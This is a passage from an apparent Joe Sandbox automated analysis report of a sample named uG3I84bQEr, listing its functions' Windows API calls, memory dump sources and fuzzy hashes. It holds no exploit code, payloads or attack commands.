                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                            • String ID:
                                                            • API String ID: 3824534824-0
                                                            • Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                            • Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
                                                            • Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                            • Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9
                                                            APIs
                                                            • GetLastError.KERNEL32(00000008,?,?,00B915D8,00B93CBB,?,00B91D2A,?,?,00000000), ref: 00B918E4
                                                            • _free.LIBCMT ref: 00B91919
                                                            • _free.LIBCMT ref: 00B91940
                                                            • SetLastError.KERNEL32(00000000,?,00B91D2A,?,?,00000000), ref: 00B9194D
                                                            • SetLastError.KERNEL32(00000000,?,00B91D2A,?,?,00000000), ref: 00B91956
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: 66107a865d519143db3ee56065088dcf2536c466b02beb16f19c60013719b870
                                                            • Instruction ID: d4e96a4b6640e8cbcba780ff3e60a321e8c6417e17b5151722f47ab89e197e69
                                                            • Opcode Fuzzy Hash: 66107a865d519143db3ee56065088dcf2536c466b02beb16f19c60013719b870
                                                            • Instruction Fuzzy Hash: 4801D1366006037B9F1267796D9AE7B26DDDBC237472108B5F915A3293FE758803A061
                                                            APIs
                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
                                                            • GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
                                                            • HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 842720411-0
                                                            • Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                            • Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
                                                            • Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                            • Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64
                                                            APIs
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                                                            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            • Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                            • Instruction ID: e33d562c89cd7b32e1c2ea0ad0b2255dbd3c00d864d4e8b233389f959c6fe991
                                                            • Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                            • Instruction Fuzzy Hash: 9F01DF72600604BBCB105F68EC44BAE7BADEF44792F100079FD04D2321DB35DD088BA4
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                            • Instruction ID: 4ceb344e541e682f07f906f107c4893f4acd0a9012da7968cf5d6b0cf31b4d70
                                                            • Opcode Fuzzy Hash: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                            • Instruction Fuzzy Hash: 89015B71D01A19DBCF00DFE4DC585EEBB78FB09711F4004AAE941F2240DB3459548BAA
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                            • Instruction ID: c07733b115f7f4265118d5d6f8c893d5168d9180ec19ac620c451b64c6eb697f
                                                            • Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                            • Instruction Fuzzy Hash: 71F0AF70200704AFEB110FA5EC88E6B3BACEF4A755B10043EF945D2250DF649C09DB64
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
                                                            • MessageBeep.USER32(00000000), ref: 0045C226
                                                            • KillTimer.USER32(?,0000040A), ref: 0045C242
                                                            • EndDialog.USER32(?,00000001), ref: 0045C25C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                                            • Instruction ID: 1cbdf9da880a683b58ffeaf16326a4f2222d3a7c74a558aa9ab436c5b6b9af77
                                                            • Opcode Fuzzy Hash: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                                            • Instruction Fuzzy Hash: DF0167309047049BEB205B54DD8EB9A7778BB00706F000ABEB942A15E1DBF8699DDB59
                                                            APIs
                                                            • _free.LIBCMT ref: 00B93189
                                                              • Part of subcall function 00B92096: HeapFree.KERNEL32(00000000,00000000,?,00B93208,?,00000000,?,00000000,?,00B9322F,?,00000007,?,?,00B92697,?), ref: 00B920AC
                                                              • Part of subcall function 00B92096: GetLastError.KERNEL32(?,?,00B93208,?,00000000,?,00000000,?,00B9322F,?,00000007,?,?,00B92697,?,?), ref: 00B920BE
                                                            • _free.LIBCMT ref: 00B9319B
                                                            • _free.LIBCMT ref: 00B931AD
                                                            • _free.LIBCMT ref: 00B931BF
                                                            • _free.LIBCMT ref: 00B931D1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 0851a5d57d8728fad3b866e6d99094edfa83cb0adf197db9a3a51d30f0eb753a
                                                            • Instruction ID: c696920e884b9ece862c046d3797fdb75a160974f11465b8223bc3390f343a5b
                                                            • Opcode Fuzzy Hash: 0851a5d57d8728fad3b866e6d99094edfa83cb0adf197db9a3a51d30f0eb753a
                                                            • Instruction Fuzzy Hash: 6AF06232900210BB8E34EB64F8C2C2673E9FA00B5075408A9F449E7612CB30FD80CA60
                                                            APIs
                                                            • EndPath.GDI32(?), ref: 004013BF
                                                            • StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
                                                            • SelectObject.GDI32(?,00000000), ref: 004013EE
                                                            • DeleteObject.GDI32 ref: 00401401
                                                            • StrokePath.GDI32(?), ref: 0040141C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                                            • Instruction ID: 52848d70ea624aaff4fbf1a8dc35ad1b05fe5f58837c3e038025b123c59b5ab6
                                                            • Opcode Fuzzy Hash: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                                            • Instruction Fuzzy Hash: E9F01930000A08EFDB516F26EC4CB5D3BA4A741326F188639E829981F1CB3459A9DF28
                                                            APIs
                                                              • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                              • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                              • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                              • Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB
                                                            • __swprintf.LIBCMT ref: 00412ECD
                                                            Strings
                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                            • API String ID: 1943609520-557222456
                                                            • Opcode ID: 2233712eb4bf0390e9830eca6b547194fd182ef3ee55646a6909b3329085d77f
                                                            • Instruction ID: 5fa1cbf72f49bdff47ddac1708762697048697bfe45d30711dc422f43ccdaf03
                                                            • Opcode Fuzzy Hash: 2233712eb4bf0390e9830eca6b547194fd182ef3ee55646a6909b3329085d77f
                                                            • Instruction Fuzzy Hash: AF91AD716083119FD714EF25D985CAFB7A8EF85314F00482FF441AB2A2DA78ED85CB5A
                                                            APIs
                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ContainedObject
                                                            • String ID: AutoIt3GUI$Container$%I
                                                            • API String ID: 3565006973-4251005282
                                                            • Opcode ID: 062e79ac20f775a6682f03866d4de74e978744786b19c4cb35eeb0bad5a62688
                                                            • Instruction ID: 7009c248d49ee490af6c5c3a89f60ad5612698b65dddc7868321d046ba5149c9
                                                            • Opcode Fuzzy Hash: 062e79ac20f775a6682f03866d4de74e978744786b19c4cb35eeb0bad5a62688
                                                            • Instruction Fuzzy Hash: E6915B70200605AFDB14DF64C884B6ABBE5FF49705F20856EED46CB392EB74E845CBA4
                                                            APIs
                                                            • __startOneArgErrorHandling.LIBCMT ref: 004250AD
                                                              • Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandling__87except__start
                                                            • String ID: pow
                                                            • API String ID: 2905807303-2276729525
                                                            • Opcode ID: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                            • Instruction ID: 06df28618b400316a62ebb5dd7aba5b0962afb7cd5aceff72fbc56c90cb9ae17
                                                            • Opcode Fuzzy Hash: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                            • Instruction Fuzzy Hash: 20518B20B0C50186DB217B24ED2137F2B909B44700F608AABE4D5863AADE3D8DD4DB8E
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: 3cA$_A
                                                            • API String ID: 4104443479-3480954128
                                                            • Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                            • Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
                                                            • Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                            • Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2326795674-1439706946
                                                            • Opcode ID: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                            • Instruction ID: a782af31bde95408328e4f00c38aa01da76ea549d3e2a3982252f7da8ca2871c
                                                            • Opcode Fuzzy Hash: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                            • Instruction Fuzzy Hash: CD21D032100218BBDF11DFA4CC42FEE3B69EB48724F210615FE156B190DA79EC918BA4
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$MoveWindow
                                                            • String ID: Listbox
                                                            • API String ID: 3315199576-2633736733
                                                            • Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                            • Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
                                                            • Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                            • Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                              • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                            • _wcscat.LIBCMT ref: 00444CB7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
